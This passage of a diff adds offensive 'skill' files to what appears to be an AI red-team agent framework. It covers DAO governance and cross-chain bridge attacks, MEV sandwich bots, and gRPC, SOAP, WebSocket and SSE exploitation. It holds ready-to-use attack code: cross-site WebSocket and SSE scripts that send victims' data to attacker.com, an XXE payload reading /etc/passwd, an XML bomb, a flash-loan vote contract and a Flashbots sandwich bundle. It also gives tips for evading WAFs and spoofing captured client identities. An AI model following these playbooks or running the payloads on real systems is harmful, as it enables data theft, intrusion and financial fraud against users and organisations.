+Bridges using a quote-and-relay model price slippage via oracle. Manipulate the oracle → arbitrage drains liquidity:
+
+```
+Step 1: Borrow large position on chain A
+Step 2: Manipulate underlying spot price oracle that bridge fee uses
+Step 3: Initiate cross-chain transfer at the manipulated rate
+Step 4: Repay loan, profit = bridge fee discount on a large transfer
+```
+
+## Bridge audit checklist (the bugs that broke real bridges)
+
+1. **`verify_signature` trust chain**: from where does the verifier load its trust roots? Can the caller spoof them?
+2. **Validator set update**: is there a quorum check on changing validators? Can a 51% rotate themselves out and stay in?
+3. **Nonce vs chainId binding**: does the signed message include destChainId?
+4. **Claim state machine**: nonce-used mapping written BEFORE external token call?
+5. **Default values**: any `address(0)`, `bytes32(0)`, `1` in initialize that becomes a trusted value?
+6. **Pause / rescue functions**: are they gated by a multisig that's actually distributed?
+7. **Relayer trust**: does the bridge trust relayer-provided data, or re-verify on-chain?
+8. **Fee/rate oracle**: TWAP or spot? Manipulable?
+
+## Tooling
+
+```bash
+# Foundry test against a fork — simulate the exact bridge flow
+forge test --fork-url $RPC --match-contract Bridge --fork-block-number 17000000
+
+# Slither — finds reentrancy + signature-replay heuristics
+slither <project>
+
+# Echidna — fuzz the bridge claim function with arbitrary calldata
+echidna-test test/Bridge.t.sol --config echidna.yaml
+
+# Tenderly — live simulation against deployed bridge contracts
+```
+
+## OPSEC / scope
+
+- Bridge attacks are direct financial theft. **Never** test against live bridges without explicit ownership/written authorization.
+- Bug bounty bridges (Immunefi top payouts) are the legitimate channel — read the Immunefi scope, then test on a private fork.
+- Disclose responsibly — bridge maintainers may need 24-72h to drain liquidity to a safe vault.
+
+## References
+
+- Rekt.news — every major bridge hack post-mortem
+- Trail of Bits "Cross-Chain Bridge Architecture" deep dive
+- Wormhole / Ronin / Harmony / Nomad post-mortems (official)
+- "How to Build a Secure Cross-Chain Bridge" — Chainlink Labs research

--- a/packages/decepticon/decepticon/skills/standard/contracts/governance-attack/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/contracts/governance-attack/SKILL.md
@@ -1,0 +1,122 @@
+---
+name: contracts-governance-attack
+description: "DAO governance attack — flash-loan-backed vote manipulation, delegation hijack, quorum dilution, proposal-spam DoS, time-lock bypass via emergency multisig, snapshot vs. on-chain vote desync, Compound/Aave/Uniswap-style GovernorBravo abuse."
+when_to_use: "dao governance vote proposal governorbravo compound aave uniswap snapshot timelock multisig delegation flash loan quorum"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: contracts
+  tags: defi, dao, governance, flash-loan
+  mitre_attack: T1565.001, T1190
+---
+
+# DAO Governance Attack
+
+## Attack classes
+
+### 1. Flash-loan-backed vote
+DAOs that grant voting power = current token balance (not snapshot of past balance) are vulnerable:
+
+```solidity
+// Attack: borrow governance token, vote, return loan, all in one tx
+function attack() external {
+    // 1. Flash-borrow gov tokens
+    IFlashLoan(aave).flashLoan(address(this), govToken, 1_000_000e18, "");
+}
+function executeOperation(...) external {
+    // 2. Vote on the malicious proposal
+    governor.castVote(proposalId, 1);   // 1 = for
+    // 3. Repay loan + premium (automatic by flash-loan callback)
+}
+```
+
+This is what happened to Beanstalk (April 2022, $182M loss) — attacker flash-borrowed Beanstalk gov tokens, voted to drain the treasury, repaid the loan. Same block.
+
+**Defense check:** Does `getVotes(address, blockNumber)` reference a past snapshot? If yes (Compound's GovernorBravo pattern, OZ Governor with `ERC20Votes` + `getPastVotes`), flash-loan vote doesn't work.
+
+### 2. Delegation hijack
+ERC20Votes lets users delegate. If a contract holds gov tokens and delegates to itself, controlling that contract = controlling the votes.
+
+```solidity
+// If the target DAO has a contract holding tokens that delegates to itself,
+// and that contract is upgradeable/has an admin function:
+upgradeableContract.upgradeAndCall(newImpl, abi.encodeWithSelector(redelegate.selector, attacker));
+// Now attacker controls those votes.
+```
+
+### 3. Quorum dilution attack
+If quorum = % of total supply (not % of currently-active voters), an attacker can mint or stake extra tokens to push quorum out of reach:
+
+```solidity
+// Some DAOs base quorum on totalSupply()
+// Attacker mints a bunch of tokens to themselves (via legit minting if they're holder)
+// Quorum requirement now too high for real voters to meet → all proposals fail
+```
+
+### 4. Proposal spam DoS
+GovernorBravo has a proposalThreshold. If low, attacker spams proposals to:
+- Burn proposers' gas
+- Confuse the UI
+- Push real proposals out of the active window
+
+### 5. Time-lock bypass via emergency multisig
+Most DAOs have a "Security Council" or "Emergency Multisig" that can execute without time-lock for emergencies. If signers can be socially engineered, phished, or are compromised: instant treasury drain.
+
+Check: `timelock.executor()` — if it's a multisig and you can compromise N-of-M signers, the time-lock is illusory.
+
+### 6. Snapshot vs. on-chain desync
+Off-chain Snapshot.org votes use signed messages. If the DAO trusts Snapshot results and executes via a relayer:
+- Forge votes by sniping pending signed messages
+- Bribe voters off-chain (cheaper than on-chain)
+- Replay signed messages on a fork
+
+### 7. Proposal-script slippage
+GovernorBravo proposals execute calldata. If the proposal description and the actual calldata don't match, voters approve one thing while approving another:
+
+```solidity
+// Description: "Allocate 1000 USDC to grants"
+// Actual calldata: transfer(attacker, 1_000_000e6)
+// Voters who don't decode calldata get rugged.
+```
+
+## Recon
+
+```bash
+# Identify the governance contract
+cast call --rpc-url $RPC $TIMELOCK "getMinDelay()(uint256)"
+cast call --rpc-url $RPC $GOVERNOR "votingPeriod()(uint256)"
+cast call --rpc-url $RPC $GOVERNOR "proposalThreshold()(uint256)"
+cast call --rpc-url $RPC $GOVERNOR "quorum(uint256)(uint256)" $BLOCK
+
+# Compound/Aave/Uniswap-style: Get GovernorBravo state
+forge inspect GovernorBravoDelegate storage-layout
+
+# List active proposals
+cast logs --rpc-url $RPC --address $GOVERNOR \
+  --from-block latest:-1000 \
+  "ProposalCreated(uint256,address,address[],uint256[],string[],bytes[],uint256,uint256,string)"
+```
+
+## Defender's checklist (the audit you're trying to defeat)
+
+| Defense | Bypass |
+|---|---|
+| `getVotes` uses past-block snapshot | Can't flash-loan-vote — find delegation-hijack instead |
+| Two-step time-lock (queue + execute) | Can't bypass without compromised emergency multisig |
+| `proposalThreshold > 0` | Can't spam — but might still be cheap |
+| Off-chain vote (Snapshot) → on-chain by N-of-M multisig | Replace at the multisig layer |
+
+## Tooling
+
+```bash
+# Tally, Boardroom — DAO dashboards (find target governance contracts)
+# Forge / Foundry — simulate the attack on a fork
+forge test --fork-url $RPC --match-test test_governance_drain
+# Tenderly — live transaction simulation against fork
+```
+
+## References
+
+- "Beanstalk Governance Attack" post-mortems (Beanstalk Farms, April 2022)
+- Compound GovernorBravo audit reports (OpenZeppelin)
+- "Slippage in Governance Proposals" — Trail of Bits research
+- Devcon Bogota talks on governance security

--- a/packages/decepticon/decepticon/skills/standard/contracts/mev-sandwich/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/contracts/mev-sandwich/SKILL.md
@@ -1,0 +1,116 @@
+---
+name: contracts-mev-sandwich
+description: "MEV sandwich attacks — front-run + back-run a victim swap on Uniswap V2/V3, Curve, Balancer; mempool monitoring via Flashbots / private RPC, slippage tolerance exploitation, JIT liquidity sandwich, multi-block MEV."
+when_to_use: "mev sandwich front-run back-run uniswap v2 v3 curve balancer slippage flashbots private mempool jit liquidity searcher"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: contracts
+  tags: defi, mev, front-running, dex
+  mitre_attack: T1565.002
+---
+
+# MEV Sandwich Attack
+
+You observe a victim's DEX swap in the mempool. Sandwich it: buy the same token before the victim (pushing price up), let the victim swap at a worse price, then sell after them.
+
+## Detect a sandwichable swap
+
+```python
+# Stream pending transactions
+from web3 import Web3
+w3 = Web3(Web3.HTTPProvider("https://eth.merkle.io"))
+# Or: subscribe to alchemy/blocknative streams
+
+# Filter for Uniswap V2 swapExactTokensForTokens or V3 exactInputSingle
+# Look at the swap amount + slippage tolerance (deadline + minAmountOut)
+# Sandwichable when: swap_amount * slippage > sandwich_gas_cost * 2
+```
+
+Math: profitable when victim's slippage tolerance exceeds your gas cost. Typical threshold for ETH/USDC swaps: victim swap >$10k with >1% slippage.
+
+## Construct the sandwich bundle
+
+```solidity
+// Bundle: 3 tx in same block, in order
+// 1. attacker_tx_1: swap baseToken -> token (push price UP)
+// 2. victim_tx:     swap baseToken -> token (worse price now)
+// 3. attacker_tx_2: swap token -> baseToken (sell back at higher price)
+```
+
+```javascript
+// Flashbots bundle (Ethereum mainnet — others have similar private RPCs)
+const ethers = require("ethers");
+const { FlashbotsBundleProvider } = require("@flashbots/ethers-provider-bundle");
+
+const provider = new ethers.providers.JsonRpcProvider(process.env.RPC);
+const wallet = new ethers.Wallet(process.env.PK, provider);
+const fb = await FlashbotsBundleProvider.create(provider, wallet, "https://relay.flashbots.net");
+
+const blockNumber = await provider.getBlockNumber();
+const bundle = [
+  { signer: wallet, transaction: attackerTx1 },  // front-run
+  { signedTransaction: rawVictimTx },             // victim from mempool
+  { signer: wallet, transaction: attackerTx2 },  // back-run
+];
+
+const signedBundle = await fb.signBundle(bundle);
+await fb.sendRawBundle(signedBundle, blockNumber + 1);
+```
+
+## JIT (Just-In-Time) liquidity sandwich
+
+Uniswap V3 concentrated liquidity lets you provide liquidity in a tight range for one block:
+
+```solidity
+// 1. Just before victim's swap: mint a position concentrated at victim's price
+// 2. Victim swaps — your liquidity earns 100% of the fee
+// 3. Just after: burn the position
+// No price-impact risk; pure fee capture.
+```
+
+Works when victim's swap is large enough that the fee exceeds gas + capital cost.
+
+## Multi-block MEV
+
+Cross-block sandwiches when validator is also the searcher (or in collusion):
+
+```
+Block N:    attacker front-run TX
+Block N+1:  victim's TX (separate user, expects same price)
+Block N+2:  attacker back-run TX
+```
+
+Requires builder/searcher cooperation. PBS (proposer-builder separation) on Ethereum makes this harder; still works on chains with single-block validators.
+
+## Defenses that break sandwiches (what to look for as "harder targets")
+
+- Victim uses private mempool (Flashbots Protect, MEV-Blocker, bloXroute Private Tx)
+- Victim contract has tight `minAmountOut` (low slippage like 0.1%)
+- DEX uses commit-reveal (rare)
+- Threshold encryption mempools (Shutter, etc.)
+
+## Common pitfalls (sandwich-of-sandwich = your sandwich gets sandwiched)
+
+- Don't broadcast your sandwich publicly — always use Flashbots / private relay
+- Other searchers also see the victim — outbid them via gas price + priority fee
+- Don't sandwich your own user's swap from same Address — easy attribution
+
+## Tooling
+
+- `mev-inspect-py` (Flashbots) — historical sandwich detection (defender + reverse research)
+- `mev-share` — partial-order-flow ecosystem
+- `searcher-sage` — open-source sandwich bot patterns
+- `Eigenphi` — MEV analytics dashboard (for reconning known searcher patterns)
+
+## OPSEC / ethics / legal
+
+- Sandwich attacks are public mempool predation, generally legal but ethically grey. In bounty context: **only ever test on test networks or on a target you own.**
+- For research / detection: use mev-inspect-py against historical blocks; no harm.
+- Some chains (e.g., Solana / Jito) have different MEV architectures — adapt accordingly.
+
+## References
+
+- "Flash Boys 2.0" (Daian et al., 2019) — original MEV academic paper
+- Flashbots docs — docs.flashbots.net
+- "MEV Wiki" — github.com/flashbots/mev-research
+- EthCC / Devcon talks: search "MEV" on YouTube

--- a/packages/decepticon/decepticon/skills/standard/exploit/api/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/api/SKILL.md
@@ -1,0 +1,46 @@
+---
+name: api-overview
+description: "Modern API category — gRPC, SOAP/WSDL, WebSocket, Server-Sent Events. Routing skill: identify the API protocol from the response Content-Type or wire format, then load the matching sub-skill."
+when_to_use: "api protocol modern grpc soap wsdl websocket ws sse server-sent-events http2 streaming"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: api
+  tags: api, modern-protocols
+  mitre_attack: T1190
+---
+
+# Modern API Attack Category
+
+This is a routing skill. Identify the API protocol then load the matching sub-skill.
+
+## Sub-skills
+
+| Protocol | Sub-skill | Wire signature |
+|---|---|---|
+| **gRPC** | `grpc` | HTTP/2 + `application/grpc[+proto|+json]`, port 50051/443 |
+| **SOAP/WSDL** | `soap-wsdl` | XML body in `text/xml`/`application/soap+xml`, `?wsdl` discovery |
+| **WebSocket** | `websocket` | HTTP `Upgrade: websocket` handshake, then framed binary/text |
+| **Server-Sent Events** | `server-sent-events` | `Content-Type: text/event-stream`, one-way streaming |
+
+## Quick fingerprint
+
+```bash
+# gRPC?
+curl -sk -I --http2 https://target/svc | grep -i 'application/grpc'
+
+# SOAP?
+curl -sk "https://target/endpoint?wsdl" | head -1   # XML WSDL doc
+curl -sk -X POST -H 'Content-Type: text/xml' https://target/endpoint   # 500 with SOAP fault
+
+# WebSocket?
+curl -sk -I -H "Connection: Upgrade" -H "Upgrade: websocket" https://target/ws | head -1
+# 101 = WS upgrade
+
+# SSE?
+curl -sk -i https://target/stream -H "Accept: text/event-stream" | grep 'text/event-stream'
+```
+
+## Sibling skills
+
+For REST + GraphQL go to:
+- `load_skill("/skills/standard/exploit/web/SKILL.md")` — sub-skills `graphql`, `idor`, `mass-assignment`, etc.

--- a/packages/decepticon/decepticon/skills/standard/exploit/api/grpc/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/api/grpc/SKILL.md
@@ -1,0 +1,109 @@
+---
+name: api-grpc
+description: "gRPC API exploitation — reflection-based discovery via grpcurl, protobuf fuzzing, missing authz on streaming RPCs, gRPC-Web → backend SSRF, mTLS bypass, metadata header injection, h2c smuggling against gRPC fronts."
+when_to_use: "grpc proto protobuf reflection grpcurl streaming bidirectional unary mtls h2c grpc-web envoy"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: api
+  tags: grpc, protobuf, http2, api
+  mitre_attack: T1190, T1203
+---
+
+# gRPC API Attack Surface
+
+## Discovery
+
+```bash
+# 1. Detect: HTTP/2 + content-type application/grpc[+proto|+json]
+curl -s -I --http2 https://api.target/svc/method | grep -iE 'content-type|alt-svc'
+
+# 2. List services via server reflection (often left on in prod)
+grpcurl -plaintext target:50051 list
+grpcurl -plaintext target:50051 list mypackage.MyService
+grpcurl -plaintext target:50051 describe mypackage.MyService.Method
+
+# 3. If reflection disabled, grab .proto from:
+#   - Sourcemap of a gRPC-Web client app
+#   - JS bundle: `grep -ro "name: \"\\([A-Z][A-Za-z]*Service\\)" *.js`
+#   - Mobile app (apktool + jadx → search for FileDescriptorProto)
+```
+
+## Attack patterns
+
+### Missing authz on streaming RPCs
+Many implementations enforce auth on unary RPCs but skip server-streaming or bidi-streaming:
+
+```bash
+grpcurl -plaintext -H "authorization: bearer" target:50051 \
+  mypackage.MyService/StreamEvents
+# Sometimes returns events without proper auth check
+```
+
+### Protobuf field-number reuse / unknown-field exfil
+Send a request with extra protobuf fields (numbers not in the .proto) — older servers echo them back or expose internal state via `UnknownField` handling.
+
+```bash
+echo '{"id": 1, "1000000": "hidden field"}' | \
+  grpcurl -plaintext -d @ target:50051 mypackage.MyService/Get
+```
+
+### Metadata header injection
+gRPC headers (metadata) often map directly to HTTP/2 headers in the proxy layer:
+
+```bash
+grpcurl -plaintext -H "x-real-ip: 127.0.0.1" -H "x-forwarded-for: 127.0.0.1" \
+  -H "authorization: bearer $TOKEN" target:50051 mypackage.AdminService/Reset
+```
+
+### h2c smuggling — gRPC fronted by Envoy/nginx
+HTTP/2 cleartext upgrade can be smuggled past h1/h2 boundary:
+
+```bash
+# Use h2csmuggler.py against an Envoy fronting a gRPC backend
+python3 h2csmuggler.py -x https://front.target/ -t /AdminService.Reset http://internal-grpc:50051
+```
+
+### mTLS bypass via SNI mismatch
+If the backend validates mTLS but the front terminates TLS, sometimes SNI-different connections bypass:
+
+```bash
+# Connect with cert for `legit.com` but Host header `admin-internal`
+grpcurl -cacert ca.crt -cert legit.crt -key legit.key \
+  -authority admin-internal target:443 mypackage.AdminService/Reset
+```
+
+### gRPC-Web → backend SSRF
+gRPC-Web translates browser HTTP → backend gRPC. Sometimes the translator allows arbitrary upstream:
+
+```bash
+# If the Envoy filter is misconfigured:
+curl https://target/grpc-web/upstream/127.0.0.1:50051/AdminService/Reset
+```
+
+## Fuzz strategy
+
+```bash
+# 1. Pull all the proto definitions
+grpcurl -plaintext target:50051 describe -msg-template > schema.txt
+
+# 2. Generate fuzz inputs with grpc-fuzzer or Mayhem
+mayhem run grpcfuzzer -t target:50051 -s schema.txt
+
+# 3. Or manual: enumerate Method/{empty,minimal,max,min,negative,oversized}
+for m in $(grpcurl -plaintext target:50051 list | xargs -I{} grpcurl -plaintext target:50051 list {}); do
+  echo "=== $m ==="
+  grpcurl -plaintext -d '{}' target:50051 $m 2>&1 | head -5
+done
+```
+
+## OPSEC
+
+- gRPC error responses leak internal types (stack traces in `google.rpc.Status.details`). Even hardened servers leak via timing on encrypted channels.
+- HTTP/2 connection re-use makes per-request rate limiting brittle — flood detection often misses.
+
+## References
+
+- "Attacking gRPC" — NCC Group whitepaper
+- grpcurl manual — github.com/fullstorydev/grpcurl
+- protoc-gen-grpc-web — gRPC-Web spec
+- DEFCON 30 "Cloud Native Track" — gRPC attack patterns

--- a/packages/decepticon/decepticon/skills/standard/exploit/api/server-sent-events/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/api/server-sent-events/SKILL.md
@@ -1,0 +1,94 @@
+---
+name: api-server-sent-events
+description: "Server-Sent Events (SSE / EventSource) exploitation — origin abuse for cross-site streaming exfil, prompt-injection via SSE messages into LLM clients, retry-after token leak, fragmenting events to bypass content-type sniffers."
+when_to_use: "sse server-sent-events eventsource text/event-stream stream cross-origin retry id event"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: api
+  tags: sse, eventsource, streaming
+  mitre_attack: T1190, T1185
+---
+
+# Server-Sent Events (SSE) Attack Surface
+
+SSE is one-way (server → browser) over HTTP/1.1 or HTTP/2 with `Content-Type: text/event-stream`. Used by LLM chat UIs, live dashboards, progress notifications, log streamers.
+
+## Detect
+
+```bash
+curl -sk -i https://target/stream -H "Accept: text/event-stream" | head
+# Look for: Content-Type: text/event-stream
+# Body format:
+#   id: 42
+#   event: message
+#   data: {"foo":"bar"}
+#   (blank line ends one event)
+```
+
+## Top bug classes
+
+### 1. Cross-Origin streaming exfil (SSE doesn't enforce CORS for `EventSource`)
+`EventSource` honors the `Access-Control-Allow-Origin` header BUT many implementations forget to set it. If a server emits a CORS-permissive header for SSE, an attacker site can subscribe with the victim's cookies:
+
+```html
+<!-- attacker.com -->
+<script>
+const es = new EventSource("https://target/stream", { withCredentials: true });
+es.onmessage = e => navigator.sendBeacon("https://attacker.com/x", e.data);
+</script>
+```
+
+Often server's CORS config covers JSON endpoints but accidentally extends to SSE. Test by hitting from a third-party origin.
+
+### 2. Prompt injection into LLM chat clients
+Many LLM frontends consume SSE for streaming tokens. If the server doesn't sanitize, an attacker-controlled upstream can inject control tokens (`[DONE]`, special markers) that confuse the client:
+
+```
+data: {"choices":[{"delta":{"content":"\u0000[DONE]"}}]}
+
+data: {"choices":[{"delta":{"content":"<script>alert(1)</script>"}}]}
+```
+
+### 3. Reconnection token leak via `Last-Event-ID`
+SSE allows resuming via the `Last-Event-ID` header. If `id:` lines carry session-state tokens, those tokens are sent on every reconnect — visible in HTTP access logs and to network proxies even on TLS-terminated intermediaries.
+
+```
+id: jwt-here-encoded
+event: message
+data: ...
+```
+
+### 4. Retry timing DoS
+Server sets `retry: 1000` on the wire. Attacker connects, instantly disconnects, repeats — server tracks reconnections in memory. Burst 10k clients → exhaustion.
+
+### 5. Fragmenting events past content-type sniffers
+A SSE stream with the first event being a JSON-shaped payload may be mis-classified by content-sniffers as JSON, enabling XSS in older IE/Edge. (Niche but appears in legacy integrations.)
+
+## Tooling
+
+```bash
+# curl with --no-buffer for live view
+curl -sk -N https://target/stream
+
+# Python sseclient — programmatic
+python3 -c '
+import sseclient, requests
+r = requests.get("https://target/stream", stream=True, headers={"Accept":"text/event-stream"})
+for ev in sseclient.SSEClient(r).events():
+    print(ev.id, ev.event, ev.data)
+'
+
+# Burp: SSE traffic shows in Proxy → HTTP history but with "streaming" indicator;
+# right-click → Send to Repeater works but won't display incremental events.
+```
+
+## OPSEC
+
+- SSE connections appear as long-lived 200 OK in logs. Server-side per-connection auth is often weak — disconnect cleanly to avoid stranded connection alerts.
+- WAFs typically don't inspect SSE bodies (they exit early on `Connection: keep-alive` + `text/event-stream`).
+
+## References
+
+- WHATWG HTML Living Standard — Server-Sent Events section
+- "SSE Considered Harmful?" — Detectify research blog
+- LLM-frontend security writeups by simonw.net (Simon Willison) — prompt-injection-via-stream patterns

--- a/packages/decepticon/decepticon/skills/standard/exploit/api/soap-wsdl/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/api/soap-wsdl/SKILL.md
@@ -1,0 +1,110 @@
+---
+name: api-soap-wsdl
+description: "SOAP / WSDL exploitation — WSDL enumeration via ?wsdl, XXE in SOAP envelope, WS-Addressing replay, WS-Security UsernameToken brute, SAML token injection in WS-Trust, schema validation bypass."
+when_to_use: "soap wsdl xml ws-security ws-addressing ws-trust saml asmx wcf .asmx .svc spring-ws"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: api
+  tags: soap, wsdl, xml, ws-security
+  mitre_attack: T1190, T1203
+---
+
+# SOAP / WSDL Attack Surface
+
+Legacy enterprise integrations still ship SOAP — payment processors, ERP middleware, government APIs, Java EE bus systems.
+
+## Discovery
+
+```bash
+# WSDL endpoints — try ?wsdl on any .asmx (.NET) / .svc (WCF) / Spring-WS endpoint
+curl -sk "https://target/Service.asmx?wsdl" | xmllint --format -
+curl -sk "https://target/Service.svc?wsdl" | xmllint --format -
+
+# Generate a client from the WSDL
+python -m zeep https://target/Service.asmx?wsdl
+# OR
+wsdl2java -uri https://target/Service.asmx?wsdl
+```
+
+## Quick attack catalog
+
+### XXE in SOAP envelope
+```bash
+curl -sk -X POST -H "Content-Type: text/xml" -H 'SOAPAction: ""' \
+  -d '<?xml version="1.0"?>
+<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]>
+<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body><tns:Method><tns:arg>&x;</tns:arg></tns:Method></soap:Body>
+</soap:Envelope>' https://target/Service.asmx
+```
+
+### WS-Security UsernameToken brute / clear-text leak
+The `<wsse:UsernameToken>` often carries `<wsse:Password>` in clear text. If the channel is HTTP (not HTTPS) or the proxy logs payload, harvest creds:
+
+```bash
+# WSPolicy may demand: Type="...#PasswordText"
+curl -sk -X POST -d @ws-attack.xml https://target/svc
+# Brute: cycle a username dict, observe response time/error class
+```
+
+### WS-Addressing replay
+SOAP responses often include `<wsa:RelatesTo>` referencing the request `<wsa:MessageID>`. Some servers don't validate freshness:
+
+```xml
+<wsa:MessageID>uuid:CAPTURED_FROM_LEGITIMATE_REQUEST</wsa:MessageID>
+```
+
+### SAML in WS-Trust / SAML EncryptedAssertion
+WS-Trust 1.3 RST/RSTR flows accept SAML tokens. Re-sign the assertion with the IdP's leaked cert OR exploit XML Signature Wrapping (XSW) — see the SAML skill for full XSW patterns.
+
+### Schema validation bypass
+Many servers parse the SOAP envelope before validating against the XSD. Inject XML that's malformed-for-schema but valid-for-parser:
+
+```xml
+<soap:Body>
+  <tns:Method>
+    <tns:adminFlag>true</tns:adminFlag>   <!-- not in XSD, often honored -->
+    <tns:arg>value</tns:arg>
+  </tns:Method>
+</soap:Body>
+```
+
+### XML Bomb / Billion Laughs DoS
+```xml
+<!DOCTYPE x [<!ENTITY a "12345678"><!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;"><!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">]>
+<x>&c;&c;&c;</x>
+```
+
+### SOAPAction routing confusion
+.NET ASMX picks the method by `SOAPAction` header, not body. Mismatch → call methods you shouldn't be able to:
+
+```bash
+curl -X POST -H 'SOAPAction: "http://target/AdminMethod"' \
+  -d '<soap:Envelope>...PublicMethod body...</soap:Envelope>' \
+  https://target/Service.asmx
+```
+
+## Tooling
+
+```bash
+# SoapUI free / Postman SOAP — interactive probing
+soapui --gui  # or non-GUI: testrunner.sh
+
+# Burp Suite extensions: Wsdler, SAML Raider, XML Signature Wrapping
+
+# python zeep — programmatic SOAP client (good for automation)
+python3 -c "from zeep import Client; c = Client('https://target/Service.asmx?wsdl'); print(c.service.Method('arg'))"
+```
+
+## OPSEC
+
+- WS-Addressing `<wsa:MessageID>` is logged in many WAFs — randomize per-request.
+- WS-Security headers reveal client identity; spoof realistic clientIDs from previously-captured requests.
+- SOAP fault messages leak stack traces — note them, but limit to one trigger per scan to avoid rate-limit alerts.
+
+## References
+
+- WS-Attacks.org — XSW, XXE, WS-Security variants catalog
+- OWASP "Testing for Web Services" — chapter on SOAP/WSDL
+- "Hacking SOAP" — Pauldotcom episode (older but still 100% applicable)
+- Burp extension: SAML Raider

--- a/packages/decepticon/decepticon/skills/standard/exploit/api/websocket/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/api/websocket/SKILL.md
@@ -1,0 +1,119 @@
+---
+name: api-websocket
+description: "WebSocket exploitation — origin-bypass (CSWSH cross-site WebSocket hijacking), missing per-message auth, message-type confusion, msg-flood DoS, ws→wss downgrade, hidden RPC routes in the WS frame layer."
+when_to_use: "websocket ws wss cswsh cross-site websocket hijacking origin socket.io stomp graphql-ws sse upgrade"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: api
+  tags: websocket, cswsh, origin-validation
+  mitre_attack: T1190, T1185
+---
+
+# WebSocket Attack Surface
+
+## Detect
+
+Look for `Upgrade: websocket` in any handshake. Common paths: `/ws`, `/socket.io`, `/graphql-ws`, `/cable` (Rails ActionCable), `/hub` (SignalR).
+
+```bash
+# Quick handshake test
+curl -sk -i \
+  -H "Connection: Upgrade" \
+  -H "Upgrade: websocket" \
+  -H "Sec-WebSocket-Key: $(openssl rand -base64 16)" \
+  -H "Sec-WebSocket-Version: 13" \
+  -H "Origin: https://target" \
+  https://target/ws
+# 101 = upgraded
+```
+
+## Top 5 bug classes
+
+### 1. Cross-Site WebSocket Hijacking (CSWSH)
+Server doesn't validate `Origin`. Attacker site can open a WS from the victim's browser with the victim's cookies:
+
+```html
+<!-- Hosted on attacker.com -->
+<script>
+const ws = new WebSocket("wss://target/ws");
+ws.onmessage = e => fetch("https://attacker.com/x?d=" + btoa(e.data));
+ws.onopen   = () => ws.send(JSON.stringify({op:"list_messages"}));
+</script>
+```
+
+Test by sending the same request you saw in DevTools but with `Origin: https://attacker.com`. If server accepts → CSWSH.
+
+### 2. Missing per-message authorization
+Server checks JWT on connect but trusts every later message. Send a connect with a low-priv token, then drop an admin-style message:
+
+```bash
+wscat -c "wss://target/ws?token=lowpriv_jwt"
+> {"op":"users.list_all"}     # ⚠ admin op succeeds
+```
+
+### 3. Message-type confusion
+Server dispatches by JSON `type` field. Send a message with two types or a type the server doesn't expect:
+
+```json
+{"type":"chat","type":"admin","args":{"cmd":"shutdown"}}
+{"type":"\u0061dmin","args":{...}}        // Unicode-normalize bypass
+```
+
+### 4. WS → wss downgrade
+If the app uses `ws://` over a public network: MITM to drop the upgrade and read everything in clear. Browser only forces wss for mixed-content cases.
+
+### 5. Hidden RPC routes
+WS multiplex many RPC methods over one socket. Discovery is rarely complete. Brute-force method names:
+
+```bash
+wscat -c wss://target/ws -H "Authorization: bearer $TOKEN" -x '{"op":"PLACEHOLDER","args":{}}'
+# Replace PLACEHOLDER with each candidate: admin.*, internal.*, debug.*, eval, etc.
+# Distinct error per route reveals what exists vs what's gated.
+```
+
+## Tooling
+
+```bash
+# wscat — interactive
+npm install -g wscat
+
+# websocat — netcat for WS
+websocat wss://target/ws
+
+# Burp Suite — full WS interception (Proxy → WebSockets History)
+
+# Pwntools-style for scripted attacks
+python3 -c '
+import websocket, json
+ws = websocket.create_connection("wss://target/ws", header=["Origin: https://target", "Cookie: session=..."])
+ws.send(json.dumps({"op":"users.list"}))
+print(ws.recv())
+ws.close()
+'
+```
+
+## Protocol-specific tips
+
+### Socket.IO
+Multiple "engine" levels: long-polling fallback, sticky sessions. Hit `/socket.io/?EIO=4&transport=polling` first.
+
+### STOMP over WebSocket
+`CONNECT` → `SEND` → `SUBSCRIBE` text frames. `SUBSCRIBE /topic/admin` often missing authz.
+
+### GraphQL-WS / graphql-transport-ws
+`connection_init` payload often carries auth. Server may accept reconnections without re-authing — replay attack.
+
+### SignalR
+Negotiate URL `/hub/negotiate`. Token in negotiate is reusable for the WS upgrade.
+
+## OPSEC
+
+- WebSocket sessions are long-lived — server-side detection is per-frame. Burst-write 1000 messages, observe quench/error rate.
+- WAFs often DON'T inspect WS frames. Once inside a WS, you can move freely vs HTTP.
+- Browser DevTools "Frames" tab makes CSWSH PoCs trivially reproducible — capture-and-replay flow.
+
+## References
+
+- PortSwigger Academy "WebSocket attacks" track
+- OWASP WebSocket testing guide
+- "Cross-Site WebSocket Hijacking" — Christian Schneider (original 2013 writeup)

--- a/packages/decepticon/decepticon/skills/standard/exploit/ics-ot/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/ics-ot/SKILL.md
@@ -1,0 +1,53 @@
+---
+name: ics-ot-overview
+description: "ICS / OT attack category — Modbus, BACnet, S7Comm, DNP3. Routing skill: fingerprint the industrial protocol by port + Wireshark dissector, then load the matching sub-skill. SAFETY-CRITICAL: always confirm written scope before any write/control class action."
+when_to_use: "ics ot industrial scada plc rtu modbus bacnet s7 siemens dnp3 hmi mes opc opc-ua profinet ethernet/ip cip"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: ics-ot
+  tags: ics, ot, scada, industrial
+  mitre_attack: T0855, T0836, T0846, T0816
+---
+
+# Industrial Control Systems / OT Category
+
+This is a routing skill for industrial protocol engagements. Identify the protocol by port + wire format, then load the matching sub-skill.
+
+## SAFETY FIRST
+
